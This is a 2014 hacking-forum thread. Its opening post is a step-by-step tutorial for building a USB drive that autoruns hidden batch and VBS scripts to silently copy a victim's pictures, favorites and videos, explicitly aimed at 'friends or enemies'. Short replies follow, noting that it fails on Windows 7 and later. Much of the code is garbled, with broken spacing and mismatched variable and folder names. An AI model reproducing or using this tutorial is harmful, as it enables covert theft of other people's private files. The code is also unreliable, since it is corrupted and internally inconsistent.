Sinisterly
steal data with the use of you usb pandrive - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+--- Thread: steal data with the use of you usb pandrive (/Thread-steal-data-with-the-use-of-you-usb-pandrive)



steal data with the use of you usb pandrive - vieckys - 01-08-2014

Now days we use Hack in many ways not only in Online but as a Slang, so Hacking passwords or any information using a USB (Pendrives). Here is the small tricks guys for stealing information or passwords of ur friends or enemies using pendrives...

Step 1 :
Open Notepad (I recommend Notepad++) and copy&paste the following lines.

Quote:
[autorun]
open=launch.bat
action=Click OK to Run
shell\open\comm and=launch.bat
Save it as autorun.inf


Its action= command is optional but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.

Step 2:
Open Notepad again and copy-paste the following lines
Quote:
@echo off
:: variables
/min
SET odrive=%odrive: ~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd%"%USERPROFILE%\ pictures""%drive%\all\My pics"
%backupcmd%"%USERPROFILE%\ Favorites""%drive%\all\Fa vorites"
%backupcmd%"%USERPROFILE%\ videos""%drive%\all\vi ds"
@echo off
cls
Save this as file.bat


This file is configured to copy the contents of the current users favorites, pictures, and videos folder to the USB drive under a folder called'data'. This is the section of the code you will need to edit depending on what you want to copy.

First file path"%USERPROFILE%\ pictures"– is the target.
Second file path"%drive%\all\My pics"– is the destination.

Step 3:

Again open Notepad and copy&paste the following line.
Quote:
CreateObject("W script.Shell"). Run""""&WScript.Argumen ts(0)&"""", 0, False
Save this as invisible.vbs


This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

Step 4:
Now open Notepad last time and copy&paste the following line.
Quote:wscript.e xe \invisible.vbs file.bat
Save this as launch.bat


This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

Step 5:
Finally copy all Four files created in the above steps and put it on the root of the USB Pen drive. Also create a folder named'data'where the contents are to be copied automatically. You can name this folder by any name, but then you need to reflect the changes you made in step 2.

This is all done. Test the USB Pen drive on your own computer first before playing it out on your friend or enemies. It works amazingly


RE: steal data with the use of you usb pandrive - greybat163 - 01-09-2014

hey this trick ishas been copied from somewhere


RE: steal data with the use of you usb pandrive - upsurt - 01-10-2014

there are better ways...


RE: steal data with the use of you usb pandrive - StRaXD - 01-12-2014

There are much better ways,but this one is good too.Thanks !


RE: steal data with the use of you usb pandrive - malfoy_G_PIR - 01-12-2014

(01-12-2014, 03:39 PM)StRaXD Wrote: There are much better ways,but this one is good too.Thanks !

Hello,

Can you show me other better way of it? if can PM me.


RE: steal data with the use of you usb pandrive - vieckys - 01-13-2014

hmm i will work for it
and thanks for appriciating..
one another way we can do i am working on this..


RE: steal data with the use of you usb pandrive - mososo - 07-26-2014

Hello daghost,

are you sure usb password stealth doesnt work with win7 or are you being specific with the method mentioned on this thread?

(01-16-2014, 02:48 PM)Dagh0st Wrote: doesnt work for win 7 and up



RE: steal data with the use of you usb pandrive - lady_godiva - 07-26-2014

(07-26-2014, 01:23 PM)mososo Wrote: Hello daghost,

are you sure usb password stealth doesnt work with win7 or are you being specific with the method mentioned on this thread?

(01-16-2014, 02:48 PM)Dagh0st Wrote: doesnt work for win 7 and up

The method he posted won't work on win7, 8, 8.1 etc.